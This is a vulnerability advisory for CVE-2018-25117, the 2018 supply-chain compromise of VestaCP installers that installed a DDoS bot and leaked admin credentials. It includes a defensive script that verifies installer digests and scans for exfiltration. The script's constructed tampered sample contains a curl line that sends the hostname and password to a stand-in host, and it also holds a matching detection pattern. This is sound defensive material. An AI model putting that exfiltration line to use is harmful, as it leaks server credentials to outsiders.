Supply-Chain Compromise in VestaCP Software by Outroll
CVE-2018-25117

9.3 CRITICAL

Key Information:

Vendor

Vesta

CVE Published:
15 October 2025

Badges

👾 Exploit Exists | 🟡 Public PoC

What is CVE-2018-25117?

Between specific commits in 2018, the VestaCP source tree was modified to carry embedded malicious code; this is a supply-chain compromise of the distributed software rather than a flaw in the panel's own logic. New installations built from the compromised tree were configured with a DDoS bot, Linux/ChachaDDoS, whose second-stage components are written in Lua. During the installation process the newly generated administrative credentials were sent to an external URL, and the installer executed a malicious payload with the local system privileges of the install process. Compromised servers then took part in large-scale DDoS attacks, and Vesta acknowledged exploitation in the wild in October 2018.
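One defensive check that follows from this incident, added here as an example and not code from the VestaCP project or from the CVE record: refuse to run a downloaded installer unless it matches a SHA-256 digest pinned out of band, and scan it for lines that hand a credential-looking variable to curl or wget before anything is executed. The two sample scripts, the host collector.example.invalid and the variable names are constructed for illustration and are not indicators from the 2018 compromise.

```shell
#!/usr/bin/env bash
# Added example, not VestaCP project code: gate execution of a downloaded
# installer on (1) a pinned SHA-256 digest and (2) a scan for lines that
# pass a credential-looking variable to curl/wget. Hosts and variable
# names below are constructed for illustration, not real indicators.
set -u

# Constructed sample standing in for a tampered install script.
# "collector.example.invalid" is a hypothetical exfiltration host.
SAMPLE_TAMPERED='#!/bin/bash
vpass=$(head -c 12 /dev/urandom | base64)
/usr/local/vesta/bin/v-add-user admin "$vpass" admin@localhost
curl -s "http://collector.example.invalid/?host=$(hostname)&pass=$vpass" >/dev/null
'

# Constructed sample of a clean script (no outbound credential traffic).
SAMPLE_CLEAN='#!/bin/bash
vpass=$(head -c 12 /dev/urandom | base64)
/usr/local/vesta/bin/v-add-user admin "$vpass" admin@localhost
'

# sha256 FILE -> hex digest (falls back to shasum where sha256sum is absent)
sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_digest FILE EXPECTED -> 0 if the file matches the pinned digest, 1 otherwise
verify_digest() {
    [ "$(sha256 "$1")" = "$2" ]
}

# scan_exfil FILE -> prints matching lines; returns 1 if any found, 0 if clean.
# Heuristic: a curl/wget invocation on a line that also expands a variable
# whose name contains pass/pwd/secret/token. Extend the list for your scripts.
scan_exfil() {
    if grep -niE '(curl|wget)[^|]*\$\{?[A-Za-z0-9_]*(pass|pwd|secret|token)' "$1"; then
        return 1
    fi
    return 0
}

# check_installer FILE EXPECTED -> 0 only if both checks pass; never runs the file
check_installer() {
    verify_digest "$1" "$2" || { echo "digest mismatch: $1" >&2; return 1; }
    scan_exfil "$1" >/dev/null || { echo "credential exfiltration pattern in: $1" >&2; return 1; }
    return 0
}

# Demo: the pinned digest is the one a maintainer would publish for the clean
# script; the tampered copy fails the digest check and the scan.
demo() {
    local clean tampered pinned
    clean=$(mktemp) && tampered=$(mktemp)
    printf '%s' "$SAMPLE_CLEAN" >"$clean"
    printf '%s' "$SAMPLE_TAMPERED" >"$tampered"
    pinned=$(sha256 "$clean")
    check_installer "$clean" "$pinned" && echo "clean copy: OK to run (bash \"$clean\")"
    check_installer "$tampered" "$pinned" || echo "tampered copy: refused"
    rm -f "$clean" "$tampered"
}
demo
```

The digest is only worth pinning if it comes from somewhere other than the download location (a release note, a signed tag), because an attacker who can replace the script can usually replace a checksum served beside it. The grep heuristic catches the plain-text credential exfiltration the description mentions; it will not catch a second stage that is obfuscated, base64-wrapped, or fetched and executed later.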

Affected Version(s)

Control Panel (CP) commit a3f0fa1 (2018-05-31)

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate that the vulnerability can be exploited. It is also a key building block for weaponization, which can end in ransomware deployment.

CVSS V4

Score: 9.3
Severity: CRITICAL
Confidentiality: High
Integrity: High
Availability: None
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: Unknown

Timeline

  • 🟡 Public PoC available
  • 👾 Exploit known to exist
  • Vulnerability published
  • Vulnerability reserved

Credit

Kaspersky Labs